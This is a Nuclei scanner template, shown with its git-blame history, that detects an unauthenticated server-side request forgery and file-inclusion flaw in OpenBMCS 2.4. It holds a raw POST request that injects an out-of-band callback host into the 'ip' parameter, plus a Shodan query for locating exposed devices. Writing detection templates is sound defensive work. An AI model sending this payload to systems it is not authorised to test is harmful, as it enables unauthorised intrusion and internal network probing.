nuclei-templates/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml

id: openbmcs-ssrf

info:
  name: OpenBMCS 2.4 - Server-Side Request Forgery /  Remote File Inclusion
  author: dhiyaneshDK
  severity: medium
  description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
  reference:
    - https://www.exploit-db.com/exploits/50670
    - https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 6.8
    cwe-id: CWE-918
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:1550906681
  tags: ssrf,oast,openbmcs,edb,misconfig

http:
  - raw:
      - |
        POST /php/query.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        ip={{interactsh-url}}:80&argu=/

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"

      - type: status
        status:
          - 302

# digest: 4a0a00473045022100d16aff0d228e68a1485794929aa88d53d923ce9378f15e7b2fbd697d71ad7d8f02206a1ababde1fe4eb58f8a87979a6610f04427085510b630bb842c0fa7f2b086e2:922c64590222798bb761d5b6d8e72950
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`id: openbmcs-ssrf`

			`info:`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`name: OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`author: dhiyaneshDK`
trailing spaces fixed 2023-01-24 07:29:21 +00:00			`severity: medium`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/50670`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`- https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N`
			`cvss-score: 6.8`
			`cwe-id: CWE-918`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`shodan-query: http.favicon.hash:1550906681`
add misconfig tag to templates in http/misconfiguration 2023-06-02 23:20:49 +00:00			`tags: ssrf,oast,openbmcs,edb,misconfig`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`- raw:`
			`- \|`
			`POST /php/query.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`

			`ip={{interactsh-url}}:80&argu=/`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the DNS Interaction`
			`words:`
			`- "http"`

			`- type: status`
			`status:`
			`- 302`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022100d16aff0d228e68a1485794929aa88d53d923ce9378f15e7b2fbd697d71ad7d8f02206a1ababde1fe4eb58f8a87979a6610f04427085510b630bb842c0fa7f2b086e2:922c64590222798bb761d5b6d8e72950`